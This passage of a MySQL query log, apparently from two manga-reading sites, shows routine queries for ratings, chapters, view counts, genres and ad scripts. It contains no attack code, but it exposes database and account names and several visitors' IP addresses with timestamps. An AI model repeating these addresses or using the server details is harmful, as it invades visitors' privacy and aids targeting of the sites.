'252' order by created desc 330660597 Quit 330660598 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660598 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330660598 Quit 330660599 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660599 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330660599 Quit 330660600 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660600 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330660600 Quit 330660601 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660601 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330660601 Quit 330660602 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660602 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330660602 Quit 330660603 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660603 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330660603 Quit 330660604 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660604 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330660604 Quit 330660605 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660605 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330660605 Quit 330660606 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660606 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330660606 Quit 330660607 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660607 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330660607 Quit 330660608 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660608 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330660608 Quit 330660609 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660609 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330660609 Quit 330660610 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660610 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330660610 Quit 330660611 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660611 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330660611 Quit 330660612 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660612 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330660612 Quit 330660613 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660613 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330660613 Quit 330660614 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660614 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330660614 Quit 330660615 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660615 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330660615 Quit 330660616 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660616 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330660616 Quit 330660617 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660617 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330660617 Quit 330660618 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660618 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330660618 Quit 330660619 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660619 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330660619 Quit 330660620 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660620 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330660620 Quit 330660621 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660621 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330660621 Quit 330660622 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660622 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330660622 Quit 330660623 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660623 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330660623 Quit 330660624 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660624 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330660624 Quit 330660625 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660625 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330660625 Quit 330660626 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660626 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330660626 Quit 330660627 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660627 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330660627 Quit 330660628 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660628 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330660628 Quit 330660629 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660629 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330660629 Quit 330660630 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660630 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330660630 Quit 330660631 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660631 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330660631 Quit 330660632 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660632 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330660632 Quit 330660633 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660633 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330660633 Quit 330660634 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660634 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330660634 Quit 330660635 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660635 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330660635 Quit 330660636 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660636 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330660636 Quit 330660637 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660637 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330660637 Quit 330660638 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660638 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330660638 Quit 330660639 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660639 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330660639 Quit 330660640 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660640 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330660640 Quit 330660641 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660641 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330660641 Quit 330660642 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660642 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330660642 Quit 330660643 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660643 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330660643 Quit 330660644 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660644 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330660644 Quit 330660645 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660645 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330660645 Quit 330660646 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660646 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330660646 Quit 330660647 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660647 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330660647 Quit 330660648 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660648 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330660648 Quit 330660649 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660649 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330660649 Quit 330660650 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660650 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330660650 Quit 330660651 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660651 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330660651 Quit 330660652 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660652 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330660652 Quit 330660653 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660653 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330660653 Quit 330660654 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660654 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330660654 Quit 330660655 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660655 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330660655 Quit 330660656 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660656 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330660656 Quit 330660657 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660657 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330660657 Quit 330660658 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660658 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330660658 Quit 330660659 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660659 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330660659 Quit 330660660 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660660 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330660660 Quit 330660661 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660661 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330660661 Quit 330660662 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660662 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330660662 Quit 330660663 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660663 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330660663 Quit 330660664 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660664 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330660664 Quit 330660665 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660665 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330660665 Quit 330660666 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660666 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330660666 Quit 330660667 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660667 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '303' order by created desc 330660667 Quit 330660668 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660669 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660668 Quit 330660669 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330660669 Quit 260225 19:30:09 330660670 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660671 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660670 Quit 330660671 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '18101' 330660671 Quit 330660672 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660672 Query select * FROM chapters where id = '18101' 330660672 Quit 330660673 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660673 Query select * FROM chapters where manga_id = '197' order by id desc 330660673 Quit 330660674 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660674 Query Update chapters set view=view+1 where id = '18101' 330660674 Quit 330660675 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660675 Query select * FROM chapters where id = '18101' 330660676 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660675 Quit 330660676 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '18101' 330660676 Quit 330660677 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660677 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('197', '18101', '2803:1800:501a:ee1b:bc0e:9aff:fed1:1842', 'mangacherri.com', '2026-02-26 03:30:09', '2026-02-26 03:30:09') 330660677 Quit 330660678 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660678 Query select * FROM chapter_images where chapter_id = '18101' 330660678 Quit 330660679 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660679 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '197' and m.active = 1 330660679 Quit 330660680 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660680 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='197' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 260225 19:30:10 330660680 Quit 330660681 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660682 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660681 Quit 330660682 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330660682 Quit 330660683 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660684 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660683 Quit 330660684 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330660684 Quit 330660685 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660686 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660685 Quit 330660686 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330660686 Quit 330660687 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660688 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660687 Quit 330660688 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330660688 Quit 330660689 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660690 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660689 Quit 330660690 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12435' 330660690 Quit 330660691 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660691 Query select * FROM chapters where id = '12435' 330660691 Quit 330660692 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660692 Query select * FROM chapters where manga_id = '239' order by id desc 330660692 Quit 330660693 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660693 Query Update chapters set view=view+1 where id = '12435' 330660693 Quit 330660694 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660694 Query select * FROM chapters where id = '12435' 330660694 Quit 330660695 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660695 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12435' 330660696 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660695 Quit 330660696 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('239', '12435', '142.44.233.62', 'mangacherri.com', '2026-02-26 03:30:10', '2026-02-26 03:30:10') 330660696 Quit 330660697 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660697 Query select * FROM chapter_images where chapter_id = '12435' 330660697 Quit 330660698 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660698 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '239' and m.active = 1 330660698 Quit 330660699 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660699 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='239' and m.active = 1 AND (genres like '%Animals%' OR genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shounen%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330660700 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660701 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660700 Quit 330660701 Query select k.* from (select m.*, count(r.id) as total_rating, (sum(r.rating) / count(r.id)) as average_rating, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM ratings as r join mangas as m on (m.id = r.manga_id) group by r.manga_id) as k ORDER BY RAND() DESC limit 10 260225 19:30:11 330660702 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660703 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660702 Quit 330660703 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '10048' 330660703 Quit 330660704 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660704 Query select * FROM chapters where id = '10048' 330660704 Quit 330660705 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660705 Query select * FROM chapters where manga_id = '127' order by id desc 330660705 Quit 330660706 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660706 Query Update chapters set view=view+1 where id = '10048' 330660706 Quit 330660707 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660707 Query select * FROM chapters where id = '10048' 330660708 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660707 Quit 330660708 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '10048' 330660708 Quit 330660709 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660709 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('127', '10048', '2600:1702:8921:2850:895d:15e3:cbb1:97a4', 'mangacherri.com', '2026-02-26 03:30:11', '2026-02-26 03:30:11') 330660709 Quit 330660710 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660710 Query select * FROM chapter_images where chapter_id = '10048' 330660710 Quit 330660711 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660711 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '127' and m.active = 1 330660711 Quit 330660712 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660712 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='127' and m.active = 1 AND (genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330660713 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660714 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660713 Quit 330660714 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '201' and m.active = 1 330660714 Quit 330660715 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660715 Query select * FROM chapters where id = '201' 330660715 Quit 330660716 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660716 Query select * FROM chapters where manga_id = '20' order by display_priority ASC, id desc 330660716 Quit 330660717 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660717 Query Update chapters set view=view+1 where id = '201' 330660717 Quit 330660718 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660718 Query select * FROM chapters where id = '201' 330660718 Quit 330660719 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660719 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '201' and m.active = 1 330660719 Quit 330660720 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660720 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('20', '201', '41.250.187.4', 'mangaberri.com', '2026-02-26 03:30:11', '2026-02-26 03:30:11') 330660720 Quit 330660721 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660721 Query select * FROM chapter_images where chapter_id = '201' 330660721 Quit 330660722 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660722 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '20' and m.active = 1 330660722 Quit 330660723 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660723 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='20' and m.active = 1 AND (genres like '%Action%' OR genres like '%Comedy%' OR genres like '%Martial Arts%' OR genres like '%Sci-Fi%' OR genres like '%Shounen%' OR genres like '%Space%' OR genres like '%Super Power%') ORDER BY RAND() limit 10 330660723 Quit 330660724 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660725 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660724 Quit 330660725 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330660725 Quit 330660726 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660727 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660726 Quit 330660727 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330660727 Quit 330660728 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660729 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660728 Quit 330660729 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330660729 Quit 330660730 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660731 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660730 Quit 330660731 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330660731 Quit 330660699 Quit 330660732 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660733 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660732 Quit 330660733 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330660733 Quit 330660734 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660735 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660734 Quit 330660735 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330660735 Quit 330660736 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660737 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660736 Quit 330660737 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330660737 Quit 330660738 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660739 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660739 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330660738 Quit 330660739 Quit 330660701 Quit 330660740 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660740 Query select max(c.id) as chapter_id, m.* from chapters as c join mangas as m on (m.id = c.manga_id) where m.active = 1 group by m.id order by chapter_id desc limit 30 330660740 Quit 330660741 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660741 Query SELECT stats.total_view, stats.latest_chapter_id, latest_chapter.name AS latest_chapter, m.* FROM ( SELECT c.manga_id, SUM(c.view) AS total_view, MAX(c.id) AS latest_chapter_id FROM chapters AS c GROUP BY c.manga_id ) AS stats JOIN chapters AS latest_chapter ON latest_chapter.id = stats.latest_chapter_id JOIN mangas AS m ON m.id = stats.manga_id WHERE m.active = 1 ORDER BY stats.total_view DESC 330660741 Quit 330660742 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660743 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660742 Quit 330660743 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330660743 Quit 330660744 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660745 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660744 Quit 330660745 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1954' and m.active = 1 330660745 Quit 330660746 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660746 Query select * FROM chapters where id = '1954' 330660746 Quit 330660747 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660747 Query select * FROM chapters where manga_id = '100' order by display_priority ASC, id desc 330660747 Quit 330660748 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660748 Query Update chapters set view=view+1 where id = '1954' 330660748 Quit 330660749 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660749 Query select * FROM chapters where id = '1954' 330660749 Quit 330660750 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660750 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1954' and m.active = 1 330660750 Quit 330660751 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660751 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('100', '1954', '114.119.136.164', 'mangaberri.com', '2026-02-26 03:30:11', '2026-02-26 03:30:11') 330660751 